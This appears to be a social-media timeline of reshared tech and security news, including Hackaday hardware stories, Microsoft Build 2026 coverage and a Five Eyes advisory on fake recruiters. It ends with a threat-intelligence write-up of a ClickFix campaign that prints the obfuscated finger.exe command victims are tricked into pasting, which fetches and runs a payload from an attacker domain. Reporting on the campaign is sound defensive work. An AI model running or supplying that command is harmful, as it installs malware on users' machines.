A year ago, teams were still asking whether Kubernetes belonged anywhere near their AI workloads. That question has mostly been answered as the community...coryskimming (TECHCOMMUNITY.MICROSOFT.COM)
reshared this
The media in this post is not displayed to visitors. To view it, please go to the original post.
I worm autonomi stanno arrivando! Il Cybercrime 2.0 è oramai è alle porte
📌 Link all'articolo : redhotcyber.com/post/i-worm-au…
A cura di Massimiliano Brolli
#redhotcyber #news #sicurezzainformatica #intelligenzaartificiale #worminformatici #malware
I worm autonomi stanno arrivando! Il Cybercrime 2.0 è oramai è alle porte
Scopri come il nuovo worm AI attacca le reti senza intervento umano e si riproduce autonomamente. Una minaccia emergente per la cybersecurity.Massimiliano Brolli (Red Hot Cyber)
Cybersecurity & cyberwarfare reshared this.
An Unlikely Host For An 8080 Emulator
The media in this post is not displayed to visitors. To view it, please log in.
To emulate vintage microprocessor hardware, it’s normal to find a modern host that provides alongside the number-crunching grunt, sufficient physical connections to interface with its support hardware. Thus if you were shopping around it might be reasonable to pick something with a powerful core and plenty of pins. Yet to emulate an 8080, [Ted Fried] has eschewed both of these — opting for an ATtiny85, a microcontroller deficient in both pins and processing power.
This seemingly impossible feat is achieved by reducing the physical connection to an SPI bus and offloading the support functions to a Teensy. The emulation code is significantly optimized C, and includes a 128 byte cache to speed up matters. This delivers a speed claimed to be only very slightly slower than a real 8080 when booting CP/M, which is quite a feat.
We’re sure that CP/M enthusiasts will have fun with this project, and we especially like the full write-up. Going to the effort of making fake 1975 electronics magazine covers for the project really is going the extra mile, and we appreciate that. Meanwhile if you’d like one of your own, the whole thing can be found in a GitHub project.
If you’re not familiar with the 8080, maybe we can get you started.
#Claude #Opus Found a Four-Year-Old Hole in #Zcash's Privacy Layer. Nobody Knows If Someone Already Used It.
securityaffairs.com/193224/hac…
#securityaffairs #hacking
securityaffairs.com/193224/hac…
#securityaffairs #hacking
Claude Opus Found a Four-Year-Old Hole in Zcash's Privacy Layer. Nobody Knows If Someone Already Used It.
Claude Opus 4.8 helped uncover a four-year-old critical flaw in Zcash that could have enabled undetectable creation of counterfeit coins.Pierluigi Paganini (Security Affairs)
Cybersecurity & cyberwarfare reshared this.
The media in this post is not displayed to visitors. To view it, please go to the original post.
332 – Mi rifaccia il volto uguale ai filtri dell’AI! camisanicalzolari.it/332-mi-ri…
332 - Mi rifaccia il volto uguale ai filtri dell'AI! - Marco Camisani Calzolari
Mi rifaccia il volto uguale ai filtri dell'AI! Un chirurgo estetico che conosco qui a New York mi ha detto che ci sono sempre più pazienti che gli arrivano con una foto in mano e gli chiedono di rifargli la faccia identica a quella.Marco Camisani Calzolari
reshared this
The media in this post is not displayed to visitors. To view it, please go to the original post.
Caricabatterie elettrici a rischio: Nuovi bug scoperti dai ricercatori sugli XCharge C6
📌 Link all'articolo : redhotcyber.com/post/caricabat…
A cura di Carolina Vivianti
#redhotcyber #news #sicurezzainformatica #hacking #cybersecurity #veicolielettrici #vulnerabilita
Caricabatterie elettrici a rischio: Nuovi bug scoperti dai ricercatori sugli XCharge C6
Scopri le gravi vulnerabilità XCharge C6 nei caricabatterie per veicoli elettrici e come proteggere l'infrastruttura di ricarica da attacchi remoti.Carolina Vivianti (Red Hot Cyber)
reshared this
The media in this post is not displayed to visitors. To view it, please go to the original post.
Trump considera il direttore di Palantir Shyam Sankar per guidare il CISA
📌 Link all'articolo : redhotcyber.com/post/trump-con…
A cura di Luigi Zullo
#redhotcyber #news #cybersecurity #cisa #palantir #shyamsankar #trump #amministrazionetrump
Trump considera il direttore di Palantir Shyam Sankar per guidare il CISA
Scopri le ultime notizie sulla possibile nomina di Shyam Sankar di Palantir come nuovo direttore della Cybersecurity and Infrastructure Security Agency (CISA).Luigi Zullo (Red Hot Cyber)
reshared this
Using Brand New NiMH Cells After Sitting 12 Years Unused
The media in this post is not displayed to visitors. To view it, please log in.
After finding a pack of NiMH rechargeable cells that had never been used since buying them in 2014, [DiodeGoneWild] decided to test whether they could be tossed or not. After previously testing different brand cells that had gone high internal resistance after only about five years, he wasn’t expecting much. Amazingly, the batteries not only recovered, but seems to be not that much worse off for wear.
Three of the four precharged cells still held some voltage and happily charged back up to their rated 2,000 mAh capacity basically with the first cycle. One of them read 0V initially, but was revived using the typical manual charging approach involving a bench power supply. After a few charge-discharge cycles only the deep discharged cell showed some noticeable degradation with slightly reduced capacity, but all of them read healthy internal resistance values.
What this mostly shows is that not all NiMH cells are made the same, with the Tronic ones that previously failed after a few years doing much worse than these Activ Energy cells which are apparently sold primarily at Aldi stores. Overall NiMH is a pretty robust battery chemistry, so it’s always worth it to try reviving a cell before tossing it.
youtube.com/embed/Kqlm0dOKIs0?…
Investigating the S3 Virge’s Reputation as a 3D Decelerator Card
The media in this post is not displayed to visitors. To view it, please log in.
Back in 1996 the 3D gaming market on PC was beginning to heat up, with hot new titles like Tomb Raider coming out that year and requiring much more graphics power than what was needed for old titles like Doom and Duke Nukem 3D to experience good graphics. Thus you had to pick some kind of 3D accelerator card to buy. Here a common joke was that of the available options, the S3 Virge GPU was so bad that it was actually worse than running in software rendering, but was this true? Cue [Bits und Bolts]’s investigation to finally put this myth to rest.
On software rendering mode a zippy Pentium 166 would struggle to render at 640×480 resolution, so if you wanted more than 320×240, or really knock down graphical fidelity, you had to get that 3D accelerator card. After combining a P166 with an S3 Virge/DX – a minor update to the original Virge – the Tomb Raider game was first compared while running in 512×384 resolution, which the game offers you with an S3 card installed along with bilinear filtering.
After hitting a capped 30 FPS on that first test, 640×480 was tried and hit a solid 15 FPS with bilinear filtering enabled, but the conclusion is basically that the special 512×384 resolution mode is pretty good. Perhaps the main causes of the myth was the wide variability in quality of the various GPUs using the S3 Virge chip, as well as trying to run at anything other than this special resolution which appears to target the card’s strengths.
youtube.com/embed/oQ6YwiZIQpk?…
iOS users: this is a must have (I also recommend #Psylo which I use from the beginning and OMFG love it!).
Nothing to hide?
Your phone knows otherwise.
Free, open source, no data collected.
🔗 apps.apple.com/ch/app/loupe-wh…
Loupe: What Apps Can See App - App Store
Download Loupe: What Apps Can See by Mysk Inc. on the App Store. See screenshots, ratings and reviews, user tips and more games like Loupe: What Apps Can See.App Store
reshared this
Over-Engineering an FDM Spool Holder From Prusa Mk4S Remains
The media in this post is not displayed to visitors. To view it, please log in.
Unlike resin printers where you generally just pour the fresh resin into the easily accessible vat, FDM printers need to squirrel away at least one spool and its requisite holder somewhere. For bed slingers this generally means a top-mounted spool holder, while for CoreXY enclosed printers they can appear on the sides, top or – inexplicably – on the back. While a side-mounted spool is often convenient, access to the side can still be blocked, in which case you do what [3D Maker Noob] did and over-engineer a fancy top-mounted spool holder.
The problem started after converting a Prusa Mk4S to a Core One using the conversion kit, which changes the position of the spool, forcing him to work around not having access to the right side of the machine where the default position is. After a first version using many of the left-over parts of the original Mk4S to create a fancy box-shaped spool holder, he proceeded to upgrade it as detailed in the video. All project files and instructions are available on Printables.
The result is a box you stack on top of the printer somewhat like a multi-spool box, just flatter and with a flippy lid on the front from which a rail slides out with the magnetically attached spool holder. A spool holder which you naturally can further customize to fit different spools. Even if over-engineered, you can’t deny that it would fit in confined spaces and looks pretty good while doing its job.
youtube.com/embed/mEm9JPaH9W0?…
"Un bene per il mondo": Anthropic chiede una pausa temporanea a livello globale nello sviluppo dell'intelligenza artificiale.
L'azienda sostiene che, con il rapido progresso dell'intelligenza artificiale, gli esseri umani rischiano di perdere il controllo.
Questo marketing del terrore ricorda i guru delle sette che millantano la capacità di distruggere il mondo se pronunciano le lettere del nome segreto di dio...
tech.yahoo.com/ai/article/good…
'Good for the world:' Anthropic calls for global temporary pause in AI development
Anthropic is calling for a global temporary pause on AI development, arguing humans are at risk of losing control over it as its capabilities rapidly advance.Dan Thorp-Lancaster (Yahoo Tech)
reshared this
verissimo, anche perché non hanno molti altri dati da usare per allenare i modelli
informapirata ⁂ reshared this.
IMHO l'AI e'una scusa per avere accesso a dati con il benestare e la promozione di gruppi di investitori che prima entusiasti ed ora non voglio perdere soldi.
Grazie al controllo politico ed a una triangolazione si potrebbero reiempire server di dati veri e non processati.
Una grande campagna di scraping a beneficio dichi puo'avere accesso, anche con scuse "isituzionali" o "di servizio".
Grazie al controllo politico ed a una triangolazione si potrebbero reiempire server di dati veri e non processati.
Una grande campagna di scraping a beneficio dichi puo'avere accesso, anche con scuse "isituzionali" o "di servizio".
informapirata ⁂ reshared this.
NEW: A former cybersecurity executive turned whistleblower accused IBM of getting breached three times and trying to cover up the hacks.
IBM was “routinely hacked by foreign state actors and others,” and data was frequently stolen and government agencies were “never notified,” he said in a lawsuit.
techcrunch.com/2026/06/05/form…
Former cyber executive turned whistleblower accuses IBM of covering up several data breaches | TechCrunch
IBM and two of its subsidiary companies were allegedly breached during the mid-2010s, which a lawsuit filed by a former cybersecurity executive accuses IBM of not disclosing and actively covering up.Lorenzo Franceschi-Bicchierai (TechCrunch)
Cybersecurity & cyberwarfare reshared this.
As It Turns Out, There’s More Than One Cassette Mechanism Being Made After All
The media in this post is not displayed to visitors. To view it, please log in.
It’s become an accepted truth amongst tapeheads that there’s no point looking at new hardware, because there’s only one tape mechanism being made anywhere in the world anymore, and that it sucks. [VWestlife] may enjoy German automobiles, based on the name, but he’s also a tapehead– and he took the time to demonstrate on YouTube that the accepted truth just ain’t so.
The supposed One Mechanism to Rule Them All in Lo-Fi is designed or made by Chinese company Tanishin. Certainly Tanishin does make a tape mechanism, but as [VWestlife] demonstrates with a few teardowns, there’s absolutely more than one on the market. That doesn’t mean any of the new offerings will out-compete your vintage Sony Walkman, but it does mean there are differences worth considering if you were to buy new.
Note that it is handhelds like the Walkman being talked about– it must be, since there are both slot-loading and flip-loading decks still being made, and even if you’re not a tapehead you should be able to tell that those won’t share the same part on the BOM.
With a few teardowns, he finds three separate mechanisms, followed by a deep-dive into the Tanishin. If you’re looking to buy a new walkman– or perhaps use its guts to build a mass storage device-– you might want to watch the whole thing to help you pick. On the other hand, the mechanism doesn’t matter that much, as he points out. It brings the tape over the head, but that’s not difficult. Everything else– from the motor that needs to draw the tape out evenly, to the pickup and the preamps and amplifiers–is where noise and poor quality sound tends to creep in, especially when something’s built to a budget.
Overall, [VWestlife] takes pains to point out that these ‘crappy’ new players aren’t any worse than the original Sony Walkman– we’ve just been spoiled by decades of better media than the humble compact cassette. That’s no slight against the cassette– people are still pushing its limits to this day, like this insanely fast vacuum-driven mechanism we featured.
Thanks to [Stephen Walters] for the tip!
youtube.com/embed/dYeY4DvlFDs?…
The media in this post is not displayed to visitors. To view it, please go to the original post.
Microsoft Build 2026: sette modelli MAI frontier, Frontier Tuning e agenti enterprise
#tech
spcnet.it/microsoft-build-2026…
@informatica
Microsoft Build 2026: sette modelli MAI frontier, Frontier Tuning e agenti enterprise
Al Microsoft Build 2026, tenutosi il 2 giugno a Fort Mason Center di San Francisco, Satya Nadella ha presentato MAI (Microsoft AI): una nuova famiglia di modelli frontier sviluppati internamente da Microsoft, progettati per carichi di lavoro enterprise con enfasi su efficienza hardware, sovranità dei dati e personalizzazione profonda. Sette modelli, tutti addestrati da zero, con capacità che spaziano dal ragionamento avanzato alla visione artificiale, dalla trascrizione vocale alla generazione.La famiglia MAI: sette modelli addestrati da zero
A differenza dei modelli GPT che alimentano Copilot attraverso la partnership con OpenAI, i modelli MAI sono sviluppati interamente da Microsoft. La lineup comprende:
- MAI-Thinking-1: il modello di ragionamento di punta, con 35 miliardi di parametri attivi (architettura Mixture of Experts), finestra di contesto da 256K token. Progettato per task complessi di reasoning e coding, con performance comparabili a modelli di dimensioni maggiori sul mercato.
- MAI-Code: ottimizzato per la programmazione, con contesto da 200K token per ingerire interi codebase durante le sessioni di refactoring o analisi del codice.
- MAI-Vision: modello multimodale per l’elaborazione di immagini, video e testo in modo unificato.
- MAI Nano, Core e Pro: tre tier dimensionali ottimizzati rispettivamente per dispositivi on-device (NPU), server enterprise mid-tier e orchestrazione massiva multi-agente fino a 32 catene parallele.
- Modelli specializzati per trascrizione, sintesi vocale e altre attività di elaborazione audio-visiva.
Un differenziatore chiave è la co-progettazione hardware-software: i modelli MAI sono ottimizzati per girare sul chip Maia 200 di Microsoft, con un vantaggio significativo in termini di performance per watt rispetto alle soluzioni GPU tradizionali.
Frontier Tuning: personalizzazione profonda per l’enterprise
Oltre ai modelli base, Microsoft ha introdotto il Frontier Tuning, una metodologia che consente alle organizzazioni di addestrare versioni specializzate dei modelli MAI usando i propri dati operativi.L’intuizione alla base è che il dato più prezioso non sono i corpora generali, ma le traiettorie reali degli agenti in esecuzione all’interno dell’organizzazione: i passi compiuti, le decisioni prese, i workflow completati. Questi dati permettono di creare modelli altamente specializzati che superano le alternative general-purpose sul dominio specifico, a una frazione del costo.
Un caso concreto già citato da Microsoft: McKinsey, dopo l’adozione del Frontier Tuning, ha ottenuto il tasso di successo più alto tra tutti i modelli testati, con una riduzione dei costi di circa 10 volte rispetto alle alternative.
Reinforcement Learning Environments (RLEs) per agenti specializzati
Microsoft ha introdotto anche gli RLE (Reinforcement Learning Environments): ambienti di addestramento che permettono di creare agenti altamente specializzati per task aziendali specifici. Gli RLE consentono di fare frontier tuning producendo modelli custom in grado di superare le alternative general-purpose rimanendo significativamente più efficienti in termini di costo.Tra le partnership annunciate spicca quella con la Mayo Clinic, finalizzata allo sviluppo di un modello frontier specializzato per la sanità globale e la sicurezza dei pazienti.
Integrazione nell’ecosistema Microsoft
I modelli MAI non esistono come prodotto standalone: sono integrati trasversalmente nell’ecosistema Microsoft:
- GitHub Copilot: MAI-Code e MAI-Thinking-1 sono disponibili come provider nel menù di selezione modello di Copilot.
- Visual Studio e VS Code: integrazione nativa con il workflow di sviluppo, inclusi i Team Agents di Visual Studio 2026 (code reviewer, test architect, compliance officer come agenti persistenti dentro l’IDE).
- Azure AI Foundry: i modelli MAI sono accessibili tramite API con le stesse interfacce degli altri modelli hosted su Azure, facilitando la migrazione e l’integrazione.
- Windows Agent Framework: MAI Nano gira direttamente su dispositivi Windows 11 con NPU, abilitando AI on-device sotto i 200ms di latenza.
Trust, governance e sovranità dei dati
Un tema centrale del lancio è la fiducia enterprise. Ogni modello MAI viene distribuito con un trust rubric: un file di policy machine-readable che definisce cosa il modello può accedere, come gestisce i dati personali (PII) e a quali framework di compliance aderisce.Questa separazione tra pesi del modello e vincoli operativi permette a settori regolamentati (banking, sanità, pubblica amministrazione) di deployare MAI con la certezza che il modello non esfiltrerà dati verso database esterni al tenant.
Sul fronte sicurezza applicativa, Microsoft ha presentato anche MXC (Managed Execution Containers): container integrati in Windows con policy-driven isolation per l’esecuzione sicura degli agenti, e Verity, uno strumento di governance per workflow agentici auditabili.
Prospettive per sviluppatori e sysadmin
Il lancio dei modelli MAI segna un cambio di strategia significativo per Microsoft: da puro distributore di capacità AI di terze parti (OpenAI) a produttore di modelli proprietari per scenari enterprise. Per i professionisti IT, le implicazioni pratiche più immediate sono:
- Disponibilità di un modello di ragionamento competitivo direttamente su Azure, senza dipendenza dalla roadmap OpenAI.
- Possibilità concreta di customizzare modelli su dati aziendali proprietari con garanzie di data sovereignty.
- Integrazione nativa nel toolchain già in uso (VS Code, GitHub, Azure) senza cambiamenti infrastrutturali.
- AI on-device su Windows 11 NPU per scenari a bassa latenza o con requisiti di privacy stringenti.
I modelli MAI sono disponibili in preview su Azure AI Foundry. Il Frontier Tuning è accessibile in anteprima per i clienti enterprise selezionati.
Fonte: Microsoft Build 2026 Blog · 4sysops · Windows News
Microsoft launches MAI frontier models and custom agents for enterprise workloads – 4sysops
Microsoft has introduced seven new MAI frontier models designed for image processing, transcription, voice generation, and reasoning. The lineup includes MAI ThIT News (4sysops)
reshared this
The media in this post is not displayed to visitors. To view it, please go to the original post.
GitHub Copilot come agente di modernizzazione .NET: addio al .NET Upgrade Assistant
#tech
spcnet.it/github-copilot-come-…
@informatica
GitHub Copilot come agente di modernizzazione .NET: addio al .NET Upgrade Assistant
A Microsoft Build 2026, Microsoft ha confermato ufficialmente che il .NET Upgrade Assistant è deprecato. Al suo posto, il nuovo GitHub Copilot App Modernization diventa lo strumento di riferimento per migrare applicazioni .NET legacy verso versioni moderne del framework. Non si tratta di un semplice rebranding: il passaggio da un tool rule-based a un agente AI rappresenta un cambiamento di approccio profondo, con implicazioni pratiche significative per chi gestisce codebase enterprise datate.Perché il .NET Upgrade Assistant non bastava più
Il .NET Upgrade Assistant, disponibile dalla versione 5 in poi, funzionava tramite un insieme di regole predefinite: identificava i pacchetti incompatibili, aggiornava i target framework, eseguiva trasformazioni note su file di configurazione. Questo approccio funzionava bene per migrazioni standard e poco complesse, ma mostrava i suoi limiti di fronte a pattern architetturali non canonici, codice con dipendenze circolari o applicazioni fortemente accoppiate a funzionalità specifiche di .NET Framework.Un agente AI, invece, può leggere il contesto, comprendere l’intento del codice, gestire casi edge e iterare sugli errori di compilazione in modo autonomo — qualcosa che un sistema basato su regole non può fare per definizione.
Come funziona GitHub Copilot App Modernization
L’agente è integrato direttamente in Visual Studio 2026 (e Visual Studio 2022 versione 17.14.17 o superiore) e accessibile dalla palette dei comandi di GitHub Copilot. Il flusso di lavoro tipico è il seguente:
- Si apre il progetto o la solution da migrare in Visual Studio.
- Si avvia una conversazione con GitHub Copilot specificando l’obiettivo di modernizzazione (es. “migra questa applicazione ASP.NET MVC a .NET 10”).
- L’agente analizza il codebase, identifica le dipendenze da aggiornare, le API deprecate e i pattern non compatibili.
- Esegue le modifiche necessarie in autonomia, tenta la compilazione e, in caso di errori, itera per risolverli.
- Il processo continua finché la compilazione non ha successo o finché non è necessario l’intervento umano.
Il punto chiave è l’iterazione automatica sugli errori di build: l’agente non si limita ad applicare una serie di patch e consegnare il risultato, ma verifica attivamente che il codice compili correttamente dopo ogni modifica, riprovando con approcci diversi in caso di fallimento.
Scenari di modernizzazione supportati
L’agente copre una gamma ampia di scenari di migrazione .NET:Migrazione del framework target
Il caso d’uso principale è la migrazione da .NET Framework (4.x) a .NET 8, 9 o 10. L’agente supporta i seguenti tipi di applicazione:
- ASP.NET MVC e Web API: migrazione alla versione corrispondente in ASP.NET Core.
- Windows Forms e WPF: migrazione a .NET 8/9/10 mantenendo il runtime Windows.
- Azure Functions: aggiornamento al modello isolated worker process.
- Web Forms → Blazor: supporto in arrivo; sarà possibile migrare applicazioni Web Forms verso Blazor, che rappresenta il percorso di modernizzazione più naturale per questo stack.
Conversione SDK-style
Le applicazioni .NET Framework usano ancora i vecchi file.csprojin formato XML verboso. L’agente esegue la conversione al formato SDK-style, molto più compatto e leggibile, rimuovendo riferimenti espliciti a file, gestendo iPackageReferencee allineando la struttura del progetto agli standard moderni.Integrazione di .NET Aspire
Uno degli scenari più interessanti è l’integrazione di .NET Aspire in applicazioni esistenti. L’agente può aggiungere Aspire a un’applicazione legacy, configurando l’AppHost, i service discovery e i componenti di observability (OpenTelemetry, health checks) senza dover ripartire da zero. Per team che vogliono portare in produzione applicazioni cloud-ready mantenendo il codebase esistente, questo è un cambio significativo.Aggiornamenti di librerie e pacchetti
L’agente gestisce anche scenari più circoscritti come:
- Migrazione da Newtonsoft.Json a System.Text.Json.
- Aggiornamento di Microsoft.Data.SqlClient.
- Upgrade da Semantic Kernel al nuovo Microsoft Agent Framework.
Pre-build error checking in Visual Studio 2026
Parallelamente all’agente di modernizzazione, Visual Studio 2026 introduce una funzionalità di pre-build error checking: Visual Studio identifica errori e warning prima ancora che la build venga avviata, riducendo il ciclo di feedback per lo sviluppatore. La combinazione di questa funzionalità con l’agente di modernizzazione — che itera sugli errori di compilazione in autonomia — crea un loop di sviluppo più rapido e meno dipendente dal tempo di compilazione completa.AI-assisted merge conflict resolution
Un’altra novità annunciata a Build 2026 per Visual Studio è il supporto all’AI-assisted conflict resolution: GitHub Copilot partecipa attivamente alla risoluzione dei merge conflict, aiutando lo sviluppatore a comprendere la natura del conflitto e suggerendo la risoluzione più appropriata in base al contesto del codice. Non sostituisce la decisione umana — il developer mantiene il controllo finale — ma riduce significativamente il tempo necessario per analizzare conflitti complessi in codebase di grandi dimensioni.Come iniziare
Per usare GitHub Copilot App Modernization è necessario:
- Avere Visual Studio 2026 (o Visual Studio 2022 17.14.17+) con l’estensione GitHub Copilot installata.
- Una sottoscrizione GitHub Copilot attiva (Business o Enterprise per i team).
- Aprire la solution da migrare e avviare una chat con Copilot descrivendo il tipo di migrazione desiderata.
La documentazione ufficiale è disponibile su Microsoft Learn nella sezione GitHub Copilot modernization overview.
Considerazioni pratiche per team enterprise
La deprecazione del .NET Upgrade Assistant può sorprendere chi lo usa in pipeline CI/CD per automatizzare migrazioni. È importante notare che l’agente Copilot è uno strumento interattivo, pensato per lavorare con uno sviluppatore nel loop: non è un tool da riga di comando eseguibile in modo completamente non presidiato. Per le pipeline di migrazione automatizzate, almeno nella fase attuale, sarà necessario valutare approcci ibridi.Sul fronte dei costi, l’agente usa il credito Copilot come qualsiasi altra funzionalità AI: le sessioni di modernizzazione complesse, che coinvolgono molte iterazioni di analisi e correzione, possono consumare una quantità significativa di token. Vale la pena fare un test su un progetto pilota prima di pianificare la migrazione di una solution enterprise complessa.
Conclusione
Il passaggio dal .NET Upgrade Assistant a GitHub Copilot App Modernization segna la maturità dell’approccio AI-first nella gestione del debito tecnico. Un agente che legge il codice, comprende il contesto, esegue le modifiche e itera sugli errori di compilazione in autonomia è concettualmente diverso da qualsiasi tool rule-based precedente. Per i team che gestiscono applicazioni .NET Framework legacy, vale la pena esplorare questo strumento — soprattutto per scenari come la migrazione Web Forms verso Blazor e l’integrazione di Aspire, che storicamente richiedevano sforzi manuali considerevoli.Fonti: Visual Studio Microsoft Build 2026 Announcements | GitHub Copilot App Modernization — Microsoft Learn
What's Coming Next in Visual Studio: Our Microsoft Build 2026 Announcements - Visual Studio Blog
Microsoft Build kicks off today in San Francisco, June 2 and 3. If you cannot make it in person, the sessions are streaming online for free, and I want toMads Kristensen (Visual Studio Blog)
reshared this
The media in this post is not displayed to visitors. To view it, please go to the original post.
The media in this post is not displayed to visitors. To view it, please go to the original post.
✨ Spie cinesi su LinkedIn: il Five Eyes documenta le campagne di recruiters falsi dell’intelligence militare di Pechino
#CyberSecurity
insicurezzadigitale.com/spie-c…
Spie cinesi su LinkedIn: il Five Eyes documenta le campagne di recruiters falsi dell’intelligence militare di Pechino
Le agenzie di intelligence dei cinque paesi alleati — FBI (USA), MI5 (UK), ASIO (Australia), CSIS (Canada) e NZSIS (Nuova Zelanda) — hanno emesso un alert congiunto che documenta come ufficiali dell’intelligence militare cinese si fingano recruiter professionisti su LinkedIn, Indeed e Upwork per sottrarre informazioni classificate a personale governativo, militare e della difesa. La minaccia non è nuova, ma la scala e la sofisticazione raggiunte nel 2026 rendono questo advisory un documento imprescindibile per chi opera nella sicurezza nazionale e nella protezione delle informazioni.Il modus operandi: dal curriculum all’intelligence
Il pattern operativo identificato dal Five Eyes è elegante nella sua semplicità. Gli ufficiali dell’intelligence cinese — appartenenti ai Military Intelligence Services di Pechino — creano profili verosimili su piattaforme di recruiting professionale, impersonando think tank, società di consulenza private e agenzie HR specializzate in analisi geopolitica e difesa.I profili di lavoro pubblicati riguardano tipicamente posizioni come “analista di politica estera”, “esperto di difesa per la regione Indo-Pacifica” o “ricercatore senior di relazioni bilaterali”. Il target non è casuale: i candidati vengono classificati in base al potenziale accesso a informazioni sensibili, attraverso l’analisi dei curriculum ricevuti. Chi detiene security clearance, lavora in agenzie governative o ha contatti con strutture militari sale automaticamente in cima alla lista degli obiettivi. L’advisory specifica che le piattaforme utilizzate includono LinkedIn, Indeed e Upwork, e che i candidati vengono anche contattati direttamente in base alla rilevanza dei loro profili pubblici.
La trappola del “trial report”
Una volta identificato il candidato di interesse, il processo si articola in fasi successive che servono a costruire fiducia e normalizzare richieste di informazioni progressivamente più sensibili. I selezionatori organizzano colloqui virtuali durante i quali nascondono la propria identità reale, sondando le conoscenze dell’interlocutore e il suo accesso a personale e risorse governative.Il punto critico è il cosiddetto “trial report”: ai candidati viene chiesto di scrivere un saggio di prova su temi come le relazioni bilaterali della Cina, la situazione nell’Indo-Pacifico o questioni di commercio internazionale e difesa. Accettato il primo elaborato, le richieste successive si fanno progressivamente più intrusive: ai candidati viene comunicato che i report “devono includere informazioni più privilegiate” per ricevere compensi più elevati.
A questo punto la comunicazione viene spostata su piattaforme di messaggistica cifrata. I compensi variano da qualche centinaio a diverse migliaia di dollari per report, pagati attraverso canali difficilmente tracciabili: PayPal, Payoneer, Zelle, Skrill, Wise, Western Union, e-transfer e criptovalute. I pagamenti vengono spesso effettuati da account di terze parti estranee al processo di recruiting — una classica tecnica di compartimentazione operativa che complica la tracciabilità e la raccolta di prove.
Il valore strategico dell’informazione non classificata
Uno degli aspetti più significativi dell’advisory è l’enfasi sul valore dell’informazione non classificata. Il Five Eyes avverte esplicitamente che “anche le informazioni non classificate fornite dai candidati vengono probabilmente raccolte e combinate con dati più sensibili”. Questa prospettiva sfida il tradizionale approccio alla sicurezza delle informazioni, che tende a concentrarsi esclusivamente sulla protezione dei materiali classificati.Steve Povolny di Exabeam ha commentato l’alert sottolineando come queste piattaforme stiano diventando veri e propri “ambienti di raccolta intelligence” che consentono a operatori stranieri di reclutare individui senza mai alzarsi dalla scrivania: “La minaccia insider non è più confinata ai dipendenti che rubano intenzionalmente segreti. Gli avversari prendono di mira l’intero ecosistema che circonda le informazioni sensibili — appaltatori, ex funzionari governativi, accademici, ricercatori, giornalisti ed esperti di settore che possono possedere solo frammenti di conoscenza preziosa, ma che una volta aggregati diventano intelligence operativa di valore strategico.”
Contesto storico: una tecnica scalabile e difficile da contrastare
L’uso di false opportunità lavorative come vettore di spionaggio è documentato da anni in diversi threat actor state-sponsored. Il FBI ha già messo in guardia contro operazioni analoghe attribuite alla Corea del Nord — celebri le campagne del Lazarus Group contro sviluppatori blockchain tramite finti colloqui tecnici — e all’Iran con Charming Kitten contro ricercatori nucleari e funzionari governativi. La specificità di questo advisory è l’attribuzione esplicita ai Military Intelligence Services cinesi e la documentazione di come le piattaforme di recruiting professionale siano diventate infrastrutture di raccolta intelligence sistematiche.L’alert del 3 giugno 2026 — disponibile come PDF sul portale IC3 dell’FBI — è uno dei rari momenti in cui i cinque paesi del network di intelligence condividono pubblicamente dettagli operativi su campagne attive. La scelta di rendere pubblico l’advisory suggerisce che la portata e il ritmo di queste attività abbiano raggiunto una soglia tale da giustificare un’operazione di sensibilizzazione coordinata a livello internazionale.
Raccomandazioni operative per le organizzazioni
Il Five Eyes individua come segnali d’allarme primari gli approcci non sollecitati da recruiter per posizioni che richiedono analisi di tematiche geopolitiche sensibili, le richieste di spostare le comunicazioni su app di messaggistica cifrata, le richieste di produrre report che includano informazioni “privilegiate” o “interne”, e i pagamenti attraverso piattaforme terze o criptovalute da parti non direttamente coinvolte nel recruiting.Per i responsabili della sicurezza organizzativa, l’advisory suggerisce di implementare programmi di sensibilizzazione specifici per i dipendenti con accesso a informazioni sensibili, con enfasi sul rischio rappresentato dalle piattaforme di networking professionale. La verifica dell’identità dei recruiter, la segnalazione degli approcci sospetti alle funzioni di sicurezza interne e il rispetto rigoroso delle politiche sull’uso dei social media professionali sono le contromisure fondamentali indicate.
Fonti: Five Eyes Joint Advisory — IC3/FBI, 3 giugno 2026 | SecurityWeek
Five Eyes: Chinese Spies Target Government, Military Staff With Fake Job Opportunities
Posing as recruiters on online platforms, Chinese intelligence officers target personnel with access to classified or privileged information.Ionut Arghire (SecurityWeek)
reshared this
The media in this post is not displayed to visitors. To view it, please go to the original post.
The media in this post is not displayed to visitors. To view it, please go to the original post.
✨ ClickFix si mette in cerca di lavoro: falsi annunci LinkedIn e Indeed per distribuire CastleLoader e RAT Python
#CyberSecurity
insicurezzadigitale.com/clickf…
ClickFix si mette in cerca di lavoro: falsi annunci LinkedIn e Indeed per distribuire CastleLoader e RAT Python
Il team CTI di LevelBlue SpiderLabs ha pubblicato un’analisi approfondita di una nuova variante della campagna ClickFix, comparsa in maggio 2026, che utilizza siti typosquattati impersonanti LinkedIn e Indeed per distribuire un framework MaaS denominato CastleLoader e un Remote Access Trojan (RAT) scritto in Python. La catena d’attacco combina l’abuso del protocollo Finger, esecuzione fileless tramite runtime Python portatili, cifratura ChaCha20/RC4 e comunicazioni C2 via WebSocket.Vettore iniziale: falsi CAPTCHA su cloni di LinkedIn e Indeed
L’attacco inizia con URL di phishing su domini typosquattati che imitano LinkedIn e Indeed (linkedall[.]org, uslinked[.]org, linked-on[.]com, indeed-jobs[.]net). Le URL includono parametri Google Ads (gclid, gbraid, gad_campaignid), indicando distribuzione tramite ecosistemi di advertising. Un parametro custom&verification=robotè necessario affinché il server risponda con la catena ClickFix — probabilmente come misura anti-analisi.La pagina di atterraggio mostra un finto CAPTCHA Cloudflare Turnstile. JavaScript embedded recupera il contenuto di secondo stadio da un endpoint PHP, applica ROT13 per decodificare la risposta, e inietta l’output nel DOM a runtime. Quando l’utente interagisce con il box CAPTCHA, un payload viene copiato nella clipboard tramite
document.execCommand("copy").Stage 3: il protocollo Finger come vettore LOLBin
L’elemento tecnico più rilevante di questa variante è l’abuso del protocollo Finger (porta 79) — un protocollo legacy degli anni ’70 che molti ambienti Windows mantengono abilitato per retrocompatibilità. Il comando copiato nella clipboard utilizzafinger.exe, nativo di Windows, per recuperare il payload:%COMSPEC% /c s^t^a^r^t "" /min for /f "skip=25 delims=" %e in ('f^^i^^n^^g^^e^^r wCeFgncRwB@f^^i^^n^^g^^e^^r^^.^^uslinked[.]org') do %e
